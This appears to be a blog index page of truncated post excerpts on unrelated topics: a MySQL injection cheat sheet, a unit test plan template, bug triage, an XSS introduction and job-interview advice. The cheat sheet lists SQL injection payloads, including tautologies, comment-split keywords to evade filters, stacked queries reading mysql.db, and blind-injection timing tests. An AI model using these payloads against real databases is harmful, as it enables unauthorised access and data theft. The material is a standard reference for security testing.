PD MOHANTY

  MySQL Injection Cheat Sheet Basics. SELECT * FROM login /* foobar */ SELECT * FROM login WHERE id = 1 or 1=1 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%" Variations. SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" SHOW TABLES SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES SELECT VERSION SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION() SELECT host,user,db from mysql.db SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db; Blind injection vectors. Operators SELECT 1 && 1; SELECT 1 || 1; SELECT 1 XOR 0; Evaluate all render TRUE or 1. SELECT 0.1 <= 2; SELECT 2 >= 2; SELECT ISNULL(1/0); Math SELECT FLOOR(7 + ( RAND () * 5)); SELECT ROUND(23.298, -1); Misc SELECT LENGTH(COMPRESS(REPEAT('a',1000))); SELECT MD5('abc'); Benchmark SELECT BENCHMARK(10000000,ENCODE('abc','123')); ...

Unit Test Plan Module ID: _________ Program ID: ___________   1.  Module Overview Briefly define the purpose of this module.  This may require only a single phrase: i.e.: calculates overtime pay amount, calculates equipment depreciation, performs date edit validation, or determines sick pay eligibility, etc. 1.1  Inputs to Module [Provide a brief description of the inputs to the module under test.] 1.2  Outputs from Module [Provide a brief description of the outputs from the module under test.] 1.3  Logic Flow Diagram [Provide logic flow diagram if additional clarity is required.] 2.  Test Data (Provide a listing of test cases to be exercised to verify processing logic.) 2.1  Positive Test Cases [Representative data samples should provide a spectrum of valid field and processing values including "Syntactic" permutations...

Bug Triage– Severity & Priority "Triage" is a medical term. It refers to dividing wounded or sick people into three categories: those who will die no matter what you do, those who will recover even if unaided, and those who will recover only if aided. In a situation where there's too much to do, you must concentrate on the third group. Bug Triage Meetings (sometimes called Bug Councils) are project meetings in which open bugs are divided into categories. The most important distinction is between bugs that will not be fixed in this release and those that will be There are three categories for the medical usage, software also three categories - bugs to fix now, bugs to fix later, and bugs we'll never fix Triaging a bug involves: Making sure the bug has enough information for the developers and makes sense Making sure the bug is filed in the correct place Making sure the bug has sensible "Severity" and "Priority" fields Let us see wh...

Phishing schemes are about to get a whole lot easier. Targeted attacks are much more likely to work now than ever before. Cookies stored on your computer can be retrieved by bad guys half a world away. Even big search engine companies like Google and Yahoo are shaking in their boots. What happened? The bad guys have discovered Cross-Site Scripting (XSS) and the Internet has sudden become a lot more dangerous. Through the magic of Cross-Site Scripting (XSS) even professional security people will have a hard time recognizing a phishing message. XSS also allows for the theft of cookies, and thus personal information and possibly passwords, stored on your computer. XSS may also have a detrimental affect on public search engine results and the trust we put in search results. This and much more is covered in this article. We've tried to boil things down so the subject is easy to understand. At the same time several examples are given showing just how bad XSS can be. Hopefully by the end...

No matter how reliable the candidate looks on paper, he/she needs to do deliver at the interview stage. Hiring managers share some of the most unforgettable blunders made by candidates and suggest preventive measures to avoid such goof-ups. Viren Naidu A job interview is indeed a place where even a small slip can go a long way. Candidates need to be alert and well prepared before a job interview, so that they can project a complete, holistic picture of their qualifications, as well as strike a chord with the interviewer. In some instances, a candidate may be, otherwise, well suited for the job role, but small character traits and behavioural glitches may land him/her in a tough spot, and the offer may, in turn, be withdrawn. Here are some of the common mistakes candidates make and ways in which you can avoid them: 1) Harpreet Kaur, Sr. general manager & head – human resources, Godrej & Boyce Mfg. Co. Ltd: Mistake 1: The candidate has the tendency to give the impression that he/...

IN THE WAKE OF THE CURRENT FINANCIAL DOWNTURN, POTENTIAL CANDIDATES NEED TO MAXIMISE THEIR CHANCES TO GET THE BEST JOB AND EMPLOYERS TO GET THE BEST TALENT Now more than ever, companies are becoming extremely selective when evaluating potential candidates. They are keen to test as many candidates before making an offer to ensure they get the best and most deserving. “Not only are companies becoming more selective, but with many more people looking for jobs, the competition is fierce,” opines Naveen Manjunath, managing director, Professional Aptitude Council (PAC) India. “The key is to find ways to stand-out from the crowd,” - Naveen Manjunath, managing director, Professional Aptitude Council (PAC) India Differentiate to gain… Potential candidates need to understand that most people look very similar on their resume, so the key is to differentiate themselves. For example, candidates should look for opportunities to lead groups in their community, mentor young people in their community, ...